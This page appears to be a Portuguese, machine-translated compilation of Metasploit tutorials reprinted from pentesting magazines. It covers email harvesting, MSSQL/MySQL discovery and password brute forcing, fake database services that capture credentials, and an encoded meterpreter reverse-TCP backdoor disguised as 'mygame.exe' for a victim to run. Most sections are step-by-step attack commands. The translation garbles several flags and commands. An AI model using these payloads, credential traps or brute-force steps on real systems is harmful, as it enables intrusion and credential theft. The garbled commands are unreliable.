Criar um Site Grátis Fantástico
Translate this Page



ONLINE
1





Partilhe esta Página



Total de visitas: 133682
metasploit
metasploit

Posts Tagged 'Metasploit'

Como gerar shellcode de exe personalizado no Metasploit

Para usar um exe personalizado como uma carga ou usar o seu exe personalizado em um documento ou arquivo excel, você tem que "converter" o exe para shellcode. Para fazer isso:

1> Run Kali Linux

2> Abra uma janela de terminal

3> Digite

msfconsole

e aperte enter

4> Digite

use payload/generic/custom

e aperte enter

5> Escolha a sua exe personalizado:

set PAYLOADFILE/root/Desktop/mycustomexe.exe

6> Escolha opcionalmente, um nome-título:

set PAYLOADSTR mycustomexe

7> Digite

generate

e aperte enter

 

Colheita e-mail com Metasploit

Colheita e-mail é o processo de obtenção de listas de endereços de e-mail usando vários métodos.Você pode verificar por conta própria o que e-mails, os atacantes vão descobrir sobre o seu domínio usando o módulo do Metasploit, Search Engine Domínio Collector-mail . Este módulo usa o Google, Bing e Yahoo para criar uma lista de endereços de e-mail válido para o domínio de destino. Esta ferramenta é muito útil na recolha de informações automatizado durante um teste de penetração.

Selecione módulo auxiliar :

use auxiliary/gather/search_email_collector

Mostrar opções :

show options

Definir Domínio :

set domain www.gogogle.com

Defina Output File (Economize resultados) :

set output/myuser/reports/results_file

Execute :

run

Criar Backdoor encriptada com Metasploit e Backtrack

Nós vamos usar windows / meterpreter / reverse_tcp payload. Vamos codificar carga útil 10 vezes comshikata_ga_nai e 10 vezes com call4_dword_xor .  

1. Abra a janela de console  

. 2 Tipo:

msfpayload windows / meterpreter / reverse_tcp LHOST =192.168.0.12 LPORT = 1337 R | msfencode -e x86 / shikata_ga_nai -t raw -c  10  | msfencode -e x86 / call4_dword_xor -t exe -c  10  -o mygame.exe

 

3. Run

file mygame.exe

e você receberá uma resposta semelhante a esta: mygame.exe: executável PE32 para MS Windows (GUI) Intel 80386 32-bit  

4. Para lidar com conexões de entrada de volta para a nossa máquina precisamos configurar explorar manipulador do Metasploit. Corrida

msfconsole

e, em seguida, faça o seguinte: usando metasploit explorar vários manipulador  

5. Se a sua vítima executa o arquivo malicioso em seguida, uma sessão meterpreter será aberta.  

Usando este método você não pode ignorar os anti-vírus, a maioria deles vai detectar o seu backdoor. A menos que sua vítima não tem antivírus instalado. Para criar uma despercebidos ( FUD backdoor), você terá de codificar seu backdoor e crypter do zero.

MSSQL Phishing com Metasploit

Metasploit tem um módulo de captura mssql, chamado mssql . Este módulo fornece um serviço MSSQL falso que é projetado para capturar as credenciais de autenticação do servidor MSSQL. O módulo suporta ambos os logins de bancos de dados codificados fracos, bem como logins do Windows (NTLM).  

Para selecionar o tipo de módulo de captura:

use auxiliary/server/capture/mssql

 

Opções Você pode definir CAINPWFILE opção para armazenar hashes capturados em Cain & Abel formato ouJOHNPWFILE para armazenar hashes de John The Ripper formato.

Deixe opção SRVHOST como é, 0.0.0.0, para ouvir no host local. Você pode configurar o módulo para usar SSL.  

Teste Depois de executar o módulo tentativa de conectar-se ao servidor mssql partir de outro computador em sua rede para ver como ele está funcionando.

Para se conectar a um servidor mssql abrir o seu Microsoft SQL Server Management Studio e tente fazer o login para o serviço em execução.

Você vai notar que Metasploit conquistou o nome de usuário ea senha que você inseriu no Management Studio.  

Publicado na revista Hakin9 em 25 de outubro de 2012

Brute forçando Microsoft SQL Server

Metasploit oferece módulo auxiliar mssql_login . Este módulo irá consultar a instância MSSQL para um nome de usuário e senha par específico. nome de usuário do administrador padrão para servidor SQL ésa . Nas opções deste módulo, você pode especificar uma senha específica, ou uma lista de senhas, uma lista nome de usuário ou uma lista de nome de usuário por senha, onde nomes de usuários e senhas são separados por espaço e cada par está em uma nova linha. Tendo definido as opções de simplesmente executar o módulo e aguardar os resultados! Você pode criar seu próprio arquivo de lista de senha, como fizemos em um antigo posto mysql forçando bruta .        

Publicado na revista Hakin9 em 25 de outubro de 2012

Detectando um Microsoft SQL Server

Microsoft SQL Server (MSSQL) é um sistema de gerenciamento de banco de dados relacional (RFMD) usado para armazenar, recuperar e gerenciar informações. Tal como acontece com muitos produtos da Microsoft, o SQL Server tem muitas falhas de segurança. Vamos começar por identificar a execução de servidores SQL na rede.  

Descubra portas abertas MSSQL MSSQL está executando por padrão na porta 1433 . Para descobrir o SQL Server você pode usar o nmap ou módulo auxiliar do Metasploit.  

A maneira NMAP Para descobrir portas abertas MSSQL que executar o seguinte comando:

nmap  -sT  -SV  -Pn  -p  1433 192.168.200.133

Normalmente, os administradores, quando eles precisam de mais de uma instância do SQL Server que correm a  segunda instância na porta 1434.

nmap  -sT  -SV  -Pn  -p  1433 , 1434 192.168.200.133

 

Parâmetros: -sT : TCP conectar varredura -SV : Determine Serviço de Informação da versão -Pn : Ignore Anfitrião descoberta -p 1433,1434: porta de digitalização 1433 e 1434  

Digitalização de toda a rede:

nmap  -sT  -SV  -Pn -open -p  1433 , 1434 192.168.200.0/24

 

Parâmetros: -aberto : Mostrar apenas as portas abertas  

A forma como Metasploit Metasploit oferece módulo auxiliar mssql_ping . Este módulo descobre a execução de serviços de MSSQL. Para usá-lo, digite:

use auxiliary/scanner/mssql/mssql_ping

 

Tipo:

show options

para uma lista de opções disponíveis.  

Para descobrir todos os serviços MSSQL rodando na rede, definir Rhosts valor igual a 192.168.200.0 / 24, assumindo que a sua rede de destino é neste intervalo, aumentar tópicos valor para uma varredura mais rápida e executar o módulo.  

Publicado na revista Hakin9 em 25 de outubro de 2012

Vamos Phishing

Phishing é uma tentativa de roubar informações confidenciais através da personificação de uma conhecida  organização ou site. Da mesma maneira você pode enganar um usuário para roubar suas credenciais MySQL.  Uma das habilidades do Metasploit é isso, imitar serviços conhecidos e as credenciais do usuário de captura. Entre os  vários módulos de captura, há um módulo chamado mysql .  

Este módulo fornece um serviço MySQL falso que é projetado para capturar as credenciais de autenticação do servidor MySQL. Ele captura pares de desafio e resposta que podem ser fornecidos para Cain ou John the Ripper para quebrar.  

Configuração & Testing  

Para selecionar o tipo de módulo de captura:

use auxiliary/server/capture/mysql

Este módulo oferece algumas opções interessantes. Você pode definir CAINPWFILE opção para armazenar capturados  hashes em Cain & Abel formato ou JOHNPWFILE para armazenar hashes no formato de John The Ripper.Deixe SRVHOST opção, pois é, 0.0.0.0, para ouvir no host local.  

Você também pode definir o SRVVERSION opção que é a versão do servidor MySQL que será reportado  aos clientes na resposta saudação. Esta opção deve concordar com a versão do servidor mysql verdadeiro na rede, se você não quer ser detectado.  

Você também pode configurar o módulo para usar o SSL!  

Execute o módulo e conectar ao servidor mysql captura de outro computador na rede  para ver como ele está funcionando.  

Conectar ao servidor MySQL  

Para se conectar a um servidor MySQL abra um terminal e digite:

mysql -h ip_address -u root -p

Digite qualquer senha, por agora, em rápida do mysql e ver o que está acontecendo no Metasploit!

Metasploit conquistou o hash e agora esse hash é armazenado em cain e abel e formato john em arquivos  / tmp / john e / tmp / cain que escolhi.  

Formatos  

Cain Formato NULL raiz 94e243cab3181cvef73852s3011651369196a928  112263447569708899agbbfcddneff2113434455 SHA1  

John formato root: $ $ mysqlna 1112263447569708899agbbfcddneff2113434455 *  94e243cab3181cvef73852s3011651369196a928  

Publicado na revista Hakin9 em 25 de outubro de 2012

Brute forçando MySQL

Há um módulo auxiliar no Metasploit chamado mysql_login que irá alegremente consultar um MySQL server para nomes de usuários e senhas específicas.  

Para iniciar o seu ataque que você tem que definir a opção Rhosts e escolher um nome de usuário e uma senha se você gostaria de ter uma única consulta de login.

set Rhosts 192.168.2.13

Vamos tentar um clássico usuário mysql, root.

set username root

Se você deixar a senha de opção e pass_file opção mysql_login branco tentará fazer login no servidor MySQL com senha em branco ou com o nome de usuário como senha (root). Talvez a gente tiver sorte, antes de começar banco de dados forçando bruta com uma lista de senhas.  

Usando uma lista de senhas Podemos criar nossa própria lista de senhas, baixar um a partir da Internet ou lista de senhas do backtrack / pentest / passwords / listas de palavras / rockyou.txt usar.  

Vamos criar um!  

Criando uma lista de senhas para criar a nossa lista de senhas que vamos usar crise . Se você estiver usando BackTrack , como eu, crise  já está instalada.  

Abrir Privilege Escalation -> senha Ataques -> ataques offline -> Crunch .  Caso contrário, faça o download a partir daqui .  

Execute:

. /crunch6  8 abcde123456 -o passfile.lst

O comando acima irá criar senhas entre 6 e 8 caracteres, consistindo de caracteres ASCII a, b, c, d, e, números 1,2,3,4,5,6 e todas as senhas geradas serão salvos em arquivo PASSFILE. lst.  

Usando a lista de senha Agora que temos a nossa lista de senhas armazenadas em / pentest / passwords / trituração / passfile.lst , podemos usá-lo no módulo mysql_login.

set PASS_FILE/pentest/passwords/crunch/passfile.lst

Aumenta também o número de threads simultâneos por um ataque de força bruta mais rápido.

Threads em 50
run

Mais módulo mysql_login oferece 2 opções interessantes e úteis, USER_FILE e USERPASS_FILE . Você pode usar uma lista de arquivos nome de usuário para tentar vários nomes de usuários, definindo a opção USER_FILE conformidade.  

Com USERPASS_FILE parâmetro que você pode usar um arquivo que contém ambos os nomes de usuários e  senhas no mesmo arquivo, cada nome de usuário é separado da senha com um caractere de espaço e cada par nome de usuário-senha é escrito em uma nova linha.  

Publicado na revista Hakin9 em 25 de outubro de 2012

Descubra portas abertas mysql

MySQL está sendo executado por padrão na porta 3306. Para descobrir MySQL você pode fazê-lo também com o nmap ou com módulos auxiliares do Metasploit. A maneira NMAP Nmap é uma descoberta de rede livre e open source e utilidade auditoria de segurança. Ele pode descobrir portas abertas, serviços em execução, versão do sistema operacional e muito mais.  

Para descobrir portas abertas MySQL usamos nmap assim:

nmap  -sT  -SV  -Pn  -n  -p  3306 192.168.200.133

 

Parâmetros : -sT : TCP conectar varredura -SV : Determine Serviço de Informação da versão -Pn : pular Anfitrião descoberta -p 3306: porta de digitalização 3306 -n : não resolução dns Digitalização de toda a rede    

nmap  -sT  -SV  -Pn -open -p  3306 192.168.200.0/24

 

Parâmetros : -aberto : Mostrar apenas as portas abertas  

A forma como Metasploit Metasploit oferece módulo mysql_version auxiliar. Este módulo enumera a versão de servidores MySQL em execução.

Para usá-lo digite:

use auxiliary/scanner/mysql/mysql_version

Para usar este scanner você tem que definir suas opções. Tipo:

show options

Para ver uma lista de opções disponíveis.  

Defina o Rhosts parâmetro:

set Rhosts 192.168.200.133

ou

 set Rhosts 192.168.200.0/24

 

Defina o RPORT parâmetro para um valor diferente se você acredita que o servidor MySQL está escutando em uma porta diferente:

set RPORT 3333

 

Aumentar FIOS valor para uma varredura mais rápida:

set  50

 

Agora, basta digitar:

run

e aperte enter.

Publicado na revista Hakin9 em 25 de outubro de 2012

Banco de Dados Metasploit

Toda vez que estamos executando um módulo, Metasploit banco de dados está sendo atualizado com dados. Essa é uma  característica surpreendente de Metasploit, porque é impossível lembrar de todas essas informações.Não  são comandos específicos para puxar as informações do banco de dados do Metasploit. Algumas delas nós  já visto durante nossos testes.

Puxe informações

  • hospedeiros comando irá listar todos os hosts no banco de dados,
  • notas comandar saída será as notas que Metasploit tem para cada host,
  • serviços de comando exibirá os serviços identificados nas máquinas de destino,
  • vulns irá listar todas as vulnerabilidades descobertas para cada máquina de destino,
  • creds irá listar todas as credenciais armazenadas.

Para obter mais ajuda e detalhes sobre cada comando, você pode emitir o comando em msfconsole , seguido pelo parâmetro -h .

Administrando Metasploit Bases de Dados Comandos para administrar bancos de dados.

  • db_create usuário: passwd @ localhost / dbname, crie um novo banco de dados,
  • db_connect usuário: passwd @ localhost / dbname, conectar a um banco de dados,
  • db_disconnect , desconectar do banco de dados,
  • db_destroy usuário: passwd @ localhost / dbname, para excluir o banco de dados especificado,

  Este post é parte de meu artigo sobre Metasploit que foi publicado originalmente em PenTest Revista ,edição de agosto .